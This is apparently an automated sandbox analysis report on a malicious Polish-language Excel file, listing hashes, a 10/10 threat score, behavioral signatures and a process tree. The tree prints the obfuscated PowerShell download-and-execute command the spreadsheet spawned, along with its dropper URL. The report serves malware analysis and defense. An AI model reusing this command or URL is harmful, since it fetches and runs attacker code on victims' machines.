Analysis
- max time kernel: 146s
- max time network: 151s
- platform: windows7_x64
- resource: win7
- submitted: 30-06-2020 10:54
Static task: static1

Behavioral task: behavioral1
- Sample: Potwierdzenie transakcji.xls
- Resource: win7 (windows7_x64)
- 0 signatures, 0 seconds

Behavioral task: behavioral2
- Sample: Potwierdzenie transakcji.xls
- Resource: win10v200430 (windows10_x64)
- 0 signatures, 0 seconds
General
- Target: Potwierdzenie transakcji.xls
- Size: 856KB
- MD5: 02bebda14734b392c40e86a08717e140
- SHA1: 95a6a416f682a9d254e76ec38ade01ce241b3366
- SHA256: debf78ac913e3b76debc7c4745d1e9ff858d6f3392ad02db78eb18408ac4beaf
- SHA512: 9f72ca77987b210012156cba8f8b43c2e3bd0ff109c7c665088cc92eb4ca8374576c7f4c4b6dd67e04846124f143017c62ca9930d78f6bebe435bfb3382c992c
- Score: 10/10
Malware Config (extracted)
- Language: ps1
- Source: URLs
- ps1.dropper: http://officeservicecorp.biz/Lab.jpg
Signatures

- Suspicious behavior: AddClipboardFormatListener (1 IoC)
  Processes:
    pid   process
    1448  EXCEL.EXE

- Suspicious use of SetWindowsHookEx (3 IoCs)
  Processes:
    pid   process
    1448  EXCEL.EXE
    1448  EXCEL.EXE
    1448  EXCEL.EXE

- Process spawned unexpected child process (1 IoC)
  This typically indicates the parent process was compromised via an exploit or macro.
  Processes:
    description                                                                                            pid  pid_target  process         target process
    Parent C:\Program Files\Microsoft Office\Office14\EXCEL.EXE is not expected to spawn this process      284  1448        powershell.exe  EXCEL.EXE

- Suspicious use of WriteProcessMemory (3 IoCs)
  Processes:
    description                        pid   process    target process
    PID 1448 wrote to memory of 284    1448  EXCEL.EXE  powershell.exe
    PID 1448 wrote to memory of 284    1448  EXCEL.EXE  powershell.exe
    PID 1448 wrote to memory of 284    1448  EXCEL.EXE  powershell.exe

- Suspicious use of AdjustPrivilegeToken (1 IoC)
  Processes:
    description              pid  process
    Token: SeDebugPrivilege  284  powershell.exe

- Suspicious behavior: EnumeratesProcesses (1 IoC)
  Processes:
    pid  process
    284  powershell.exe

- Suspicious use of FindShellTrayWindow (2 IoCs)
  Processes:
    pid   process
    1448  EXCEL.EXE
    1448  EXCEL.EXE
Processes (tree)

1. C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
   Command line: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /dde "C:\Users\Admin\AppData\Local\Temp\Potwierdzenie transakcji.xls"
   - Suspicious behavior: AddClipboardFormatListener
   - Suspicious use of SetWindowsHookEx
   - Suspicious use of WriteProcessMemory
   - Suspicious use of FindShellTrayWindow

   2. C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (child of 1)
      Command line: powershell.exe -Command IEX (New-Object('Net.WebClient')).'DoWnloadsTrInG'('http://officeservicecorp.biz/Lab.jpg')
      - Process spawned unexpected child process
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious behavior: EnumeratesProcesses
Downloads
- memory/284-0-0x0000000000000000-mapping.dmp